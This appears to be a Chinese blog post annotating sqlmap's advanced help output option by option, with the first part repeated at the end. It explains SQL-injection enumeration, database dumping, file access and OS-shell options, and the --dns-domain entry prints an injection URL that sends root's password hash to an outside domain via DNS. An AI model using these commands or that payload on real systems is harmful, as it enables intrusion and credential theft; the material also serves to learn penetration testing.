SQLmap中的help -hh

  1.         _  
  2.  ___ ___| |_____ ___ ___  {1.0.9.8#dev}  
  3. |_ -| . | |     | .'| . |  
  4. |___|_  |_|_|_|_|__,|  _|  
  5.       |_|           |_|   http://sqlmap.org  
  6.   
  7. 用法  
  8. Usage: python sqlmap.py [options]  
  9.   
  10. Options: 选项  
  11.   -h, --help            Show basic help message and exit  
  12.     基本的帮助信息  
  13.   -hh                   Show advanced help message and exit  
  14.     更加详细的帮助信息  
  15.   --version             Show program's version number and exit  
  16.     版本信息  
  17.   -v VERBOSE            Verbosity level: 0-6 (default 1)  
  18.     这个是设置sqlmap输出信息的详细程度,默认是1,设置成3(-v 3)就显示出payload的信息了,这个非常适合学习的一个参数  
  19.   
  20.   下面给出sqlmap.config文件中的对这个的详细描述  
  21.     # Verbosity level.  
  22.     # Valid: integer between 0 and 6  
  23.     # 0: Show only error and critical messages  只显示错误和关键信息  
  24.     # 1: Show also warning and info messages    警告和信息  
  25.     # 2: Show also debug messages               调试信息  
  26.     # 3: Show also payloads injected            payload,如:[15:32:10] [PAYLOAD] 1)',(..)"("  
  27.     # 4: Show also HTTP requests                整个GET报文都看到了  
  28.     # 5: Show also HTTP responses' headers         返回报文的头部   
  29.     # 6: Show also HTTP responses' page content    返回的html代码都有了  
  30.     # Default: 1  
  31.   
  32.   Target: 目标  
  33.     At least one of these options has to be provided to define the  
  34.     target(s)  
  35.         至少从下面选择设定一个目标,最常用的就-u了,url嘛  
  36.   
  37.     -d DIRECT           Connection string for direct database connection  
  38.     直接连接数据库,如:mysql的话  
  39.         -d mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME  
  40.         不过的话呢,这个我试过是要装第三方库的  
  41.     -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")  
  42.         这个指定url的肯定最熟悉了  
  43.     -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file  
  44.         burp用的多,但这个应该我们很少用啊,在burp的option-misc里面有个logging选项保存log文件  
  45.         查了一下:加多两个参数效率更快  
  46.         python sqlmap.py -l 文件名 --batch -smart  
  47.             batch:自动选yes。  
  48.             smart:启发式快速判断,节约时间。  
  49.     -x SITEMAPURL       Parse target(s) from remote sitemap(.xml) file  
  50.         从xml文件中解析目标  
  51.     -m BULKFILE         Scan multiple targets given in a textual file  
  52.         这个应该是从大文件中读取超级多的目标,一般文件多了就一部分一部分地读了,这个就像是一个大字典  
  53.     -r REQUESTFILE      Load HTTP request from a file  
  54.         这个也用的较多,尤其是POST注入,将一些抓包软件(如burp)抓到的HTTP报文直接保存在文件中,跟着-r就搞掂了  
  55.     -g GOOGLEDORK       Process Google dork results as target URLs  
  56.         通过google搜索找到的url作为目标,这个也是google hacking了  
  57.     -c CONFIGFILE       Load options from a configuration INI file  
  58.         通过ini文件设置选项,这个还用过啊,下面的--save参数就是保存参数到ini文件的了,这个方便下次再次黑它  
  59.   
  60.   Request: 请求  
  61.     These options can be used to specify how to connect to the target URL  
  62.   
  63.     --method=METHOD     Force usage of given HTTP method (e.g. PUT)  
  64.         指定HTTP请求的方法,GET,POST,PUT,MOVE等  
  65.     --data=DATA         Data string to be sent through POST  
  66.         指定POST的参数  
  67.     --param-del=PARA..  Character used for splitting parameter values  
  68.         这个拆分一些参数的,如下面用;拆分post参数  
  69.         python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users  
  70.     --cookie=COOKIE     HTTP Cookie header value  
  71.         指定cookie值  
  72.     --cookie-del=COO..  Character used for splitting cookie values  
  73.         指定分割cookie值的字符是什么  
  74.     --load-cookies=L..  File containing cookies in Netscape/wget format  
  75.         这个是从文件中读取cookie吧,Netscape/wget格式的  
  76.     --drop-set-cookie   Ignore Set-Cookie header from response  
  77.         忽略响应包的Set-Cookie头  
  78.     --user-agent=AGENT  HTTP User-Agent header value  
  79.         指定User-Agent用户代理  
  80.     --random-agent      Use randomly selected HTTP User-Agent header value  
  81.         随机选用sqlmap目录中的User-Agent,这个文件再txt目录  
  82.     --host=HOST         HTTP Host header value  
  83.         指定主机头  
  84.     --referer=REFERER   HTTP Referer header value  
  85.         指定Referer头,就是请求来源的意思  
  86.     -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")  
  87.         指定某个头部,如: -H "X-Forwarded-For: 127.0.0.1"  
  88.     --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")  
  89.         这个的话应该是可以指定多个,用\n分割  
  90.     --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)  
  91.         指定http认证类型  
  92.     --auth-cred=AUTH..  HTTP authentication credentials (name:password)  
  93.         指定http认证的账户名和密码,就行apache就可以设置访问某个目录时要认证  
  94.     --auth-file=AUTH..  HTTP authentication PEM cert/private key file  
  95.         指定一个私钥文件来认证  
  96.     --ignore-401        Ignore HTTP Error 401 (Unauthorized)  
  97.         忽略401错误  
  98.     --proxy=PROXY       Use a proxy to connect to the target URL  
  99.         指定代理  
  100.     --proxy-cred=PRO..  Proxy authentication credentials (name:password)  
  101.         指定代理的认证信息,就是账号密码  
  102.     --proxy-file=PRO..  Load proxy list from a file  
  103.         从文件中选择代理  
  104.     --ignore-proxy      Ignore system default proxy settings  
  105.         忽略系统默认代理  
  106.     --tor               Use Tor anonymity network  
  107.         使用tor网络  
  108.     --tor-port=TORPORT  Set Tor proxy port other than default  
  109.         设置tor的端口,如果不是默认端口的话  
  110.     --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))  
  111.         设置tor代理的类型  
  112.     --check-tor         Check to see if Tor is used properly  
  113.         检测tor能不能用  
  114.     --delay=DELAY       Delay in seconds between each HTTP request  
  115.         设置每个HTTP请求的时间间隔,这个在有些限制单位时间请求数的防火墙的时候可以用得到,我上次就用过  
  116.     --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)  
  117.         设置超时时间,默认30秒  
  118.     --retries=RETRIES   Retries when the connection timeouts (default 3)  
  119.         设置重试的次数,默认3次  
  120.     --randomize=RPARAM  Randomly change value for given parameter(s)  
  121.         随机地更改给定参数的值  
  122.     --safe-url=SAFEURL  URL address to visit frequently during testing  
  123.         有的web应用程序会在你多次访问错误的请求时屏蔽掉你以后的所有请求  
  124.         这里提供一个安全不错误的连接,每隔一段时间都会去访问一下  
  125.     --safe-post=SAFE..  POST data to send to a safe URL  
  126.         这里设置一个正确的post数据  
  127.     --safe-req=SAFER..  Load safe HTTP request from a file  
  128.         从文件中读取安全,或者叫正确的http请求  
  129.     --safe-freq=SAFE..  Test requests between two visits to a given safe URL  
  130.         设置访问安全url的时间间隔  
  131.     --skip-urlencode    Skip URL encoding of payload data  
  132.         不进行url编码  
  133.     --csrf-token=CSR..  Parameter used to hold anti-CSRF token  
  134.         设置CSRF的token  
  135.     --csrf-url=CSRFURL  URL address to visit to extract anti-CSRF token  
  136.   
  137.     --force-ssl         Force usage of SSL/HTTPS  
  138.         强制使用https  
  139.     --hpp               Use HTTP parameter pollution method  
  140.         尝试了一下,只能用于ASP,得到报错信息如下:  
  141.         [WARNING] HTTP parameter pollution should work only against ASP(.NET) targets  
  142.   
  143.     --eval=EVALCODE     Evaluate provided Python code before the request (e.g.  
  144.                         "import hashlib;id2=hashlib.md5(id).hexdigest()")  
  145.         发送请求之前,先运行这段python代码,比如对某个参数进行处理  
  146.         比如下面的,hash参数就是id的md5值  
  147.         python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"  
  148.   
  149.   Optimization: 一些优化  
  150.     These options can be used to optimize the performance of sqlmap  
  151.   
  152.     -o                  Turn on all optimization switches  
  153.         开启所有优化选项  
  154.     --predict-output    Predict common queries output  
  155.         预测常见的查询输出,可能跟一些报错出数据库信息那些有关,具体应要看源码才能说,有机会的话我看源码补充下  
  156.     --keep-alive        Use persistent HTTP(s) connections  
  157.         使用持久连接  
  158.     --null-connection   Retrieve page length without actual HTTP response body  
  159.         获得页面的长度(应该有多少字符吧,这个具体我也不确定) 除去HTTP的响应的body部分  
  160.     --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)  
  161.         设置线程,默认为1  
  162.   
  163.   Injection: 注入  
  164.     These options can be used to specify which parameters to test for,  
  165.     provide custom injection payloads and optional tampering scripts  
  166.   
  167.     -p TESTPARAMETER    Testable parameter(s)  
  168.         设定测试的参数,sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。  
  169.         这里就给你自己设定了 例如: -p "id,user-agent"  
  170.   
  171.     --skip=SKIP         Skip testing for given parameter(s)  
  172.         跳过测试给定的参数  
  173.     --skip-static       Skip testing parameters that not appear dynamic  
  174.         跳过测试参数是否是静态的  
  175.     --dbms=DBMS         Force back-end DBMS to this value  
  176.         指定后端的数据库类型(mysql,mssql等)  
  177.     --dbms-cred=DBMS..  DBMS authentication credentials (user:password)  
  178.         指定数据库的认证信息(user:password)  
  179.     --os=OS             Force back-end DBMS operating system to this value  
  180.         指定后台的系统类型  
  181.     --invalid-bignum    Use big numbers for invalidating values  
  182.         使用大数字(说是无效值),比如payload会出现8446744073709551610这样大的,配合-v 3就能看到  
  183.     --invalid-logical   Use logical operations for invalidating values  
  184.         使用逻辑字符,比如下面的:  
  185.             SELECT CHR(101)&CHR(99)&CHR(108)&CHR(89)  
  186.             SELECT CHAR(82)+CHAR(90)+CHAR(71)+CHAR(84))  
  187.             SELECT CHAR(67)||CHAR(88)||CHAR(73)||CHAR(105)  
  188.     --invalid-string    Use random strings for invalidating values  
  189.         使用随机字符  
  190.     --no-cast           Turn off payload casting mechanism  
  191.         这个看着英文像是关闭payload构造机制  
  192.     --no-escape         Turn off string escaping mechanism  
  193.         关闭字符串逃逸机制  
  194.     --prefix=PREFIX     Injection payload prefix string  
  195.         设置注入的前缀,比如单引号注入点就设置前缀为单引号  
  196.     --suffix=SUFFIX     Injection payload suffix string  
  197.         设置注入payload的后缀  
  198.     --tamper=TAMPER     Use given script(s) for tampering injection data  
  199.         使用给定的脚本去修改payload中的数据,达到绕过WAF的目的  
  200.   
  201.   Detection: 发现  
  202.     These options can be used to customize the detection phase  
  203.   
  204.     --level=LEVEL       Level of tests to perform (1-5, default 1)  
  205.         这个的话,sqlmap使用测试的方法就越多,发送越多请求,耗时也越长  
  206.     --risk=RISK         Risk of tests to perform (1-3, default 1)  
  207.         boolean-based blind SQL injection tests with AND are considered risk 1, with OR are considered risk 3:这句话是从sqlmap配置文件中找的,就是说基于布尔型盲注and型的就是risk1,or型的就是risk3,那么risk2是两个都搞?  
  208.     --string=STRING     String to match when query is evaluated to True  
  209.         设置一些返回页面中的字符,页面返回这个字符,说明我们的注入判断语句是正确的  
  210.     --not-string=NOT..  String to match when query is evaluated to False  
  211.         设置返回页面没返回某个字符,就是判断错误  
  212.     --regexp=REGEXP     Regexp to match when query is evaluated to True  
  213.         用正则匹配告诉sqlmap返回什么是正确的  
  214.     --code=CODE         HTTP code to match when query is evaluated to True  
  215.         用HTTP的响应码来判断注入判断语句是正确的,例如,响应200的时候为真,响应401的时候为假,可以添加参数--code=200  
  216.     --text-only         Compare pages based only on the textual content  
  217.         真条件下的返回页面与假条件下返回页面是不同可以使用这个  
  218.     --titles            Compare pages based only on their titles  
  219.         真条件下的返回页面的标题与假条件下返回页面的标题是不同可以使用这个  
  220.   
  221.   Techniques: 注入技术  
  222.     These options can be used to tweak testing of specific SQL injection  
  223.     techniques  
  224.   
  225.     --technique=TECH    SQL injection techniques to use (default "BEUSTQ")  
  226.         指定注入技术,默认使用全部(default "BEUSTQ"),那个含义如下:  
  227.         # B: Boolean-based blind SQL injection  
  228.         # E: Error-based SQL injection  
  229.         # U: UNION query SQL injection  
  230.         # S: Stacked queries SQL injection  
  231.         # T: Time-based blind SQL injection  
  232.         # Q: Inline SQL injection  
  233.     --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)  
  234.         使用基于时间的盲注时,设置的数据库延迟,默认是5  
  235.     --union-cols=UCOLS  Range of columns to test for UNION query SQL injection  
  236.         设置联合查询列的数目的范围  
  237.     --union-char=UCHAR  Character to use for bruteforcing number of columns  
  238.         设定union查询使用的字符,默认使用NULL  
  239.     --union-from=UFROM  Table to use in FROM part of UNION query SQL injection  
  240.         这个就不知道了,使用表单中的元素放到union注入中?  
  241.     --dns-domain=DNS..  Domain name used for DNS exfiltration attack  
  242.         利用dns进行注入加快盲注,可以看看这个  
  243.         http://blog.csdn.net/qq_27446553/article/details/51794326  
  244.         示例url:http://localhost/inject.php?user=123' and if((SELECT LOAD_FILE(CONCAT(、\\\',(SELECT concat(user,'_',mid(password,2,41)) from user where ser='root' limit 1),'.md5crack.cn\\foobar'))),1,1)%23   
  245.     --second-order=S..  Resulting page URL searched for second-order response  
  246.         这个就是我们常说的二次注入了,设置后帮你寻找二次注入的页面,不过没用过。。。  
  247.   
  248.   Fingerprint:  
  249.     -f, --fingerprint   Perform an extensive DBMS version fingerprint  
  250.         这个应该是数据库指纹识别,加了可能识别更好  
  251.   Enumeration:  
  252.     These options can be used to enumerate the back-end database  
  253.     management system information, structure and data contained in the  
  254.     tables. Moreover you can run your own SQL statements  
  255.   
  256.     -a, --all           Retrieve everything  
  257.         检索所有,这是拖库的节奏啊  
  258.     -b, --banner        Retrieve DBMS banner  
  259.         检索数据库的一些标志性的信息,就是指纹这样子吧  
  260.     --current-user      Retrieve DBMS current user  
  261.         检索当前连接数据库的用户  
  262.     --current-db        Retrieve DBMS current database  
  263.         检索当前连接的数据库  
  264.     --hostname          Retrieve DBMS server hostname  
  265.         检索服务器的主机名  
  266.     --is-dba            Detect if the DBMS current user is DBA  
  267.         检测是不是dba,就是root权限咯  
  268.     --users             Enumerate DBMS users  
  269.         枚举数据库用户  
  270.     --passwords         Enumerate DBMS users password hashes  
  271.         枚举数据库用户的哈希值  
  272.     --privileges        Enumerate DBMS users privileges  
  273.         枚举数据库用户的权限  
  274.     --roles             Enumerate DBMS users roles  
  275.         枚举数据库用户的角色  
  276.     --dbs               Enumerate DBMS databases  
  277.         枚举数据库有哪些  
  278.     --tables            Enumerate DBMS database tables  
  279.         枚举数据表名  
  280.     --columns           Enumerate DBMS database table columns  
  281.         枚举列名  
  282.     --schema            Enumerate DBMS schema  
  283.         这个测试过,将所有的数据库的表的基本信息都枚举了,有哪些列,列的数据类型,具体数据就没有枚举  
  284.     --count             Retrieve number of entries for table(s)  
  285.         枚举表格个数  
  286.     --dump              Dump DBMS database table entries  
  287.         输出数据库表的数据  
  288.     --dump-all          Dump all DBMS databases tables entries  
  289.         输出所有  
  290.     --search            Search column(s), table(s) and/or database name(s)  
  291.         查找特定的列名,表名或数据库名,配合下面的-D,-C,-T  
  292.     --comments          Retrieve DBMS comments  
  293.         枚举数据库的注释  
  294.     -D DB               DBMS database to enumerate  
  295.         指定数据库名  
  296.     -T TBL              DBMS database table(s) to enumerate  
  297.         指定表名  
  298.     -C COL              DBMS database table column(s) to enumerate  
  299.         指定列名  
  300.     -X EXCLUDECOL       DBMS database table column(s) to not enumerate  
  301.         指定不枚举那个列  
  302.     -U USER             DBMS user to enumerate  
  303.         枚举用户,但单独用这个参数感觉没什么用啊,这个可能要看源码才能解决了,估计要配合其他参数  
  304.     --exclude-sysdbs    Exclude DBMS system databases when enumerating tables  
  305.         枚举时排除系统的数据库  
  306.     --pivot-column=P..  Pivot column name  
  307.         以某一列为核心?这个用过没感觉出什么用  
  308.     --where=DUMPWHERE   Use WHERE condition while table dumping  
  309.         使用where调试限制table的输出  
  310.     --start=LIMITSTART  First query output entry to retrieve  
  311.         指定开始从第几行开始输出,如--start=3,前两行就不输出了  
  312.     --stop=LIMITSTOP    Last query output entry to retrieve  
  313.         指定从第几行开始停止输出  
  314.     --first=FIRSTCHAR   First query output word character to retrieve  
  315.         指定只输出第几个字符开始输出,盲注才有效,亲测  
  316.     --last=LASTCHAR     Last query output word character to retrieve  
  317.         指定只输出第几个字符停止输出,盲注才有效,亲测,跟上面的配合指定范围,  
  318.         如 :--first 3 --last 5  只输出3到5位置的字符  
  319.     --sql-query=QUERY   SQL statement to be executed  
  320.         指定执行我们的sql语句  
  321.     --sql-shell         Prompt for an interactive SQL shell  
  322.         返回一个sql的shell  
  323.     --sql-file=SQLFILE  Execute SQL statements from given file(s)  
  324.         从文件中读取执行sql语句  
  325.   
  326.   Brute force: 爆破  
  327.     These options can be used to run brute force checks  
  328.   
  329.     --common-tables     Check existence of common tables  
  330.         检测常见的表名  
  331.     --common-columns    Check existence of common columns  
  332.         检测常见的列名  
  333.   
  334.   User-defined function injection: 使用用户定义的函数注入  
  335.     These options can be used to create custom user-defined functions  
  336.   
  337.     --udf-inject        Inject custom user-defined functions  
  338.     --shared-lib=SHLIB  Local path of the shared library  
  339.         这两个具体没用过,直译就是注入用户定义的函数,另一个就是指定本地共享库  
  340.   
  341.   File system access:  文件系统访问  
  342.     These options can be used to access the back-end database management  
  343.     system underlying file system  
  344.   
  345.     --file-read=RFILE   Read a file from the back-end DBMS file system  
  346.         读取服务器文件  
  347.     --file-write=WFILE  Write a local file on the back-end DBMS file system  
  348.         写服务器文件  
  349.     --file-dest=DFILE   Back-end DBMS absolute filepath to write to  
  350.         设置写入的绝对路径  
  351.   
  352.   Operating system access:  操作系统访问  
  353.     These options can be used to access the back-end database management  
  354.     system underlying operating system  
  355.   
  356.     注意下面这些要有相应的权限,一般要root  
  357.   
  358.     --os-cmd=OSCMD      Execute an operating system command  
  359.         执行一个指定的命令  
  360.     --os-shell          Prompt for an interactive operating system shell  
  361.         返回一个shell  
  362.     --os-pwn            Prompt for an OOB shell, Meterpreter or VNC  
  363.         这个参数需要访问metasploit,结合metasploit使用的  
  364.     --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC  
  365.         这个参数也需要访问metasploit  
  366.     --os-bof            Stored procedure buffer overflow exploitation  
  367.         尝试储存过程的缓冲区溢出  
  368.     --priv-esc          Database process user privilege escalation  
  369.         利用数据库进程用户进行权限提升  
  370.     --msf-path=MSFPATH  Local path where Metasploit Framework is installed  
  371.         指定metasploit的路径  
  372.     --tmp-path=TMPPATH  Remote absolute path of temporary files directory  
  373.         设定临时文件路径  
  374.   
  375.   Windows registry access: windows注册表访问  
  376.     These options can be used to access the back-end database management  
  377.     system Windows registry  
  378.   
  379.     --reg-read          Read a Windows registry key value  
  380.         读取一个键  
  381.     --reg-add           Write a Windows registry key value data  
  382.         写一个键  
  383.     --reg-del           Delete a Windows registry key value  
  384.         删除一个键  
  385. 下面的应该配合上面使用的  
  386.     --reg-key=REGKEY    Windows registry key  
  387.         指定键  
  388.     --reg-value=REGVAL  Windows registry key value  
  389.         指定键值  
  390.     --reg-data=REGDATA  Windows registry key value data  
  391.         值的数据  
  392.     --reg-type=REGTYPE  Windows registry key value type  
  393.         值得类型  
  394.   
  395.   General: 通用的  
  396.     These options can be used to set some general working parameters  
  397.   
  398.     -s SESSIONFILE      Load session from a stored (.sqlite) file  
  399.         从.sqlite恢复那个会话(注入过就会自动生成),那个文件在sqlmap的output文件,(windows在C:\Users\Administrator\.sqlmap\output\)  
  400.     -t TRAFFICFILE      Log all HTTP traffic into a textual file  
  401.         HTTP请求保存到文件中  
  402.     --batch             Never ask for user input, use the default behaviour  
  403.         不要询问,使用默认选项  
  404.     --binary-fields=..  Result fields having binary values (e.g. "digest")  
  405.         设置有些字段是二进制数值?  
  406.     --charset=CHARSET   Force character encoding used for data retrieval  
  407.         设置编码  
  408.     --crawl=CRAWLDEPTH  Crawl the website starting from the target URL  
  409.         从某个url开始爬取网站  
  410.     --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")  
  411.         排除爬取网站的关键字,如logout  
  412.     --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")  
  413.         设置输出结果时的分隔符  
  414.     --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)  
  415.         设置输出是的格式,csv,html,SQLITE等  
  416.     --eta               Display for each output the estimated time of arrival  
  417.         显示每个输出估计的耗时  
  418.     --flush-session     Flush session files for current target  
  419.         刷新这个url的储存会话信息,就是更新以前注入的记录,如管理员改密码了,就要重新注入了  
  420.     --forms             Parse and test forms on target URL  
  421.         解析测试目标url的表单  
  422.     --fresh-queries     Ignore query results stored in session file  
  423.         忽略保存在会话文件储存的查询结果  
  424.     --hex               Use DBMS hex function(s) for data retrieval  
  425.         使用十六进制  
  426.     --output-dir=OUT..  Custom output directory path  
  427.         设置输出路径  
  428.     --parse-errors      Parse and display DBMS error messages from responses  
  429.         解析输出数据库错误信息  
  430.     --save=SAVECONFIG   Save options to a configuration INI file  
  431.         保存选项到ini文件  
  432.     --scope=SCOPE       Regexp to filter targets from provided proxy log  
  433.         正则表达式过滤代理文件提供的代理?  
  434.     --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)  
  435.         设置含我们指定关键字的某些测试的payload  
  436.     --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)  
  437.         跳过测试指定关键字的某些测试的payload  
  438.     --update            Update sqlmap  
  439.         更新sqlmap,记得更新了  
  440.   
  441.   Miscellaneous:  杂项  
  442.     -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")  
  443.         短记忆,什么鬼  
  444.     --alert=ALERT       Run host OS command(s) when SQL injection is found  
  445.         如果存在注入,运行系统命令  
  446.     --answers=ANSWERS   Set question answers (e.g. "quit=N,follow=N")  
  447.         设定  
  448.     --beep              Beep on question and/or when SQL injection is found  
  449.         哔一声,找到注入的话  
  450.     --cleanup           Clean up the DBMS from sqlmap specific UDF and tables  
  451.         清理数据库什么鬼,这个也不懂     
  452.     --dependencies      Check for missing (non-core) sqlmap dependencies  
  453.         看看sqlmap缺少什么第三方库  
  454.     --disable-coloring  Disable console output coloring  
  455.         关闭颜色的输出,就没那么美观咯  
  456.     --gpage=GOOGLEPAGE  Use Google dork results from specified page number  
  457.         指定google搜索的页码,找sqlmap注入目标  
  458.     --identify-waf      Make a thorough testing for a WAF/IPS/IDS protection  
  459.         尝试辨认WAF/IPS/IDS的类型  
  460.     --mobile            Imitate smartphone through HTTP User-Agent header  
  461.         使用手机User-Agent  
  462.     --offline           Work in offline mode (only use session data)  
  463.         使用离线模式  
  464.     --page-rank         Display page rank (PR) for Google dork results  
  465.         显示该url,google的rank值  
  466.     --purge-output      Safely remove all content from output directory  
  467.         安全地删除output文件夹  
  468.     --skip-waf          Skip heuristic detection of WAF/IPS/IDS protection  
  469.         跳过探测WAF/IPS/IDS  
  470.     --smart             Conduct thorough tests only if positive heuristic(s)  
  471.         全面的扫描如果是积极的启发式,不知什么鬼  
  472.     --sqlmap-shell      Prompt for an interactive sqlmap shell  
  473.         交互式的sqlmap shell  
  474.     --tmp-dir=TMPDIR    Local directory for storing temporary files  
  475.         设置临时文件目录  
  476.     --wizard            Simple wizard interface for beginner users  
  477.         为初学者用户提供简单的向导,就是问你那个url,一步步问下去  
  1.         _  
  2.  ___ ___| |_____ ___ ___  {1.0.9.8#dev}  
  3. |_ -| . | |     | .'| . |  
  4. |___|_  |_|_|_|_|__,|  _|  
  5.       |_|           |_|   http://sqlmap.org  
  6.   
  7. 用法  
  8. Usage: python sqlmap.py [options]  
  9.   
  10. Options: 选项  
  11.   -h, --help            Show basic help message and exit  
  12.     基本的帮助信息  
  13.   -hh                   Show advanced help message and exit  
  14.     更加详细的帮助信息  
  15.   --version             Show program's version number and exit  
  16.     版本信息  
  17.   -v VERBOSE            Verbosity level: 0-6 (default 1)  
  18.     这个是设置sqlmap输出信息的详细程度,默认是1,设置成3(-v 3)就显示出payload的信息了,这个非常适合学习的一个参数  
  19.   
  20.   下面给出sqlmap.config文件中的对这个的详细描述  
  21.     # Verbosity level.  
  22.     # Valid: integer between 0 and 6  
  23.     # 0: Show only error and critical messages  只显示错误和关键信息  
  24.     # 1: Show also warning and info messages    警告和信息  
  25.     # 2: Show also debug messages               调试信息  
  26.     # 3: Show also payloads injected            payload,如:[15:32:10] [PAYLOAD] 1)',(..)"("  
  27.     # 4: Show also HTTP requests                整个GET报文都看到了  
  28.     # 5: Show also HTTP responses' headers         返回报文的头部   
  29.     # 6: Show also HTTP responses' page content    返回的html代码都有了  
  30.     # Default: 1  
  31.   
  32.   Target: 目标  
  33.     At least one of these options has to be provided to define the  
  34.     target(s)  
  35.         至少从下面选择设定一个目标,最常用的就-u了,url嘛  
  36.   
  37.     -d DIRECT           Connection string for direct database connection  
  38.     直接连接数据库,如:mysql的话  
  39.         -d mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME  
  40.         不过的话呢,这个我试过是要装第三方库的  
  41.     -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")  
  42.         这个指定url的肯定最熟悉了  
  43.     -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file  
  44.         burp用的多,但这个应该我们很少用啊,在burp的option-misc里面有个logging选项保存log文件  
  45.         查了一下:加多两个参数效率更快  
  46.         python sqlmap.py -l 文件名 --batch -smart  
  47.             batch:自动选yes。  
  48.             smart:启发式快速判断,节约时间。  
  49.     -x SITEMAPURL       Parse target(s) from remote sitemap(.xml) file  
  50.         从xml文件中解析目标  
  51.     -m BULKFILE         Scan multiple targets given in a textual file  
  52.         这个应该是从大文件中读取超级多的目标,一般文件多了就一部分一部分地读了,这个就像是一个大字典  
  53.     -r REQUESTFILE      Load HTTP request from a file  
  54.         这个也用的较多,尤其是POST注入,将一些抓包软件(如burp)抓到的HTTP报文直接保存在文件中,跟着-r就搞掂了  
  55.     -g GOOGLEDORK       Process Google dork results as target URLs  
  56.         通过google搜索找到的url作为目标,这个也是google hacking了  
  57.     -c CONFIGFILE       Load options from a configuration INI file  
  58.         通过ini文件设置选项,这个还用过啊,下面的--save参数就是保存参数到ini文件的了,这个方便下次再次黑它  
  59.   
  60.   Request: 请求  
  61.     These options can be used to specify how to connect to the target URL  
  62.   
  63.     --method=METHOD     Force usage of given HTTP method (e.g. PUT)  
  64.         指定HTTP请求的方法,GET,POST,PUT,MOVE等  
  65.     --data=DATA         Data string to be sent through POST  
  66.         指定POST的参数  
  67.     --param-del=PARA..  Character used for splitting parameter values  
  68.         这个拆分一些参数的,如下面用;拆分post参数  
  69.         python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users  
  70.     --cookie=COOKIE     HTTP Cookie header value  
  71.         指定cookie值  
  72.     --cookie-del=COO..  Character used for splitting cookie values  
  73.         指定分割cookie值的字符是什么  
  74.     --load-cookies=L..  File containing cookies in Netscape/wget format  
  75.         这个是从文件中读取cookie吧,Netscape/wget格式的  
  76.     --drop-set-cookie   Ignore Set-Cookie header from response  
  77.         忽略响应包的Set-Cookie头  
  78.     --user-agent=AGENT  HTTP User-Agent header value  
  79.         指定User-Agent用户代理  
  80.     --random-agent      Use randomly selected HTTP User-Agent header value  
  81.         随机选用sqlmap目录中的User-Agent,这个文件再txt目录  
  82.     --host=HOST         HTTP Host header value  
  83.         指定主机头  
  84.     --referer=REFERER   HTTP Referer header value  
  85.         指定Referer头,就是请求来源的意思  
  86.     -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")  
  87.         指定某个头部,如: -H "X-Forwarded-For: 127.0.0.1"  
  88.     --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")  
  89.         这个的话应该是可以指定多个,用\n分割  
  90.     --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)  
  91.         指定http认证类型  
  92.     --auth-cred=AUTH..  HTTP authentication credentials (name:password)  
  93.         指定http认证的账户名和密码,就行apache就可以设置访问某个目录时要认证  
  94.     --auth-file=AUTH..  HTTP authentication PEM cert/private key file  
  95.         指定一个私钥文件来认证  
  96.     --ignore-401        Ignore HTTP Error 401 (Unauthorized)  
  97.         忽略401错误  
  98.     --proxy=PROXY       Use a proxy to connect to the target URL  
  99.         指定代理  
  100.     --proxy-cred=PRO..  Proxy authentication credentials (name:password)  
  101.         指定代理的认证信息,就是账号密码  
  102.     --proxy-file=PRO..  Load proxy list from a file  
  103.         从文件中选择代理  
  104.     --ignore-proxy      Ignore system default proxy settings  
  105.         忽略系统默认代理  
  106.     --tor               Use Tor anonymity network  
  107.         使用tor网络  
  108.     --tor-port=TORPORT  Set Tor proxy port other than default  
  109.         设置tor的端口,如果不是默认端口的话  
  110.     --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))  
  111.         设置tor代理的类型  
  112.     --check-tor         Check to see if Tor is used properly  
  113.         检测tor能不能用  
  114.     --delay=DELAY       Delay in seconds between each HTTP request  
  115.         设置每个HTTP请求的时间间隔,这个在有些限制单位时间请求数的防火墙的时候可以用得到,我上次就用过  
  116.     --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)  
  117.         设置超时时间,默认30秒  
  118.     --retries=RETRIES   Retries when the connection timeouts (default 3)  
  119.         设置重试的次数,默认3次  
  120.     --randomize=RPARAM  Randomly change value for given parameter(s)  
  121.         随机地更改给定参数的值  
  122.     --safe-url=SAFEURL  URL address to visit frequently during testing  
  123.         有的web应用程序会在你多次访问错误的请求时屏蔽掉你以后的所有请求  
  124.         这里提供一个安全不错误的连接,每隔一段时间都会去访问一下  
  125.     --safe-post=SAFE..  POST data to send to a safe URL  
  126.         这里设置一个正确的post数据  
  127.     --safe-req=SAFER..  Load safe HTTP request from a file  
  128.         从文件中读取安全,或者叫正确的http请求  
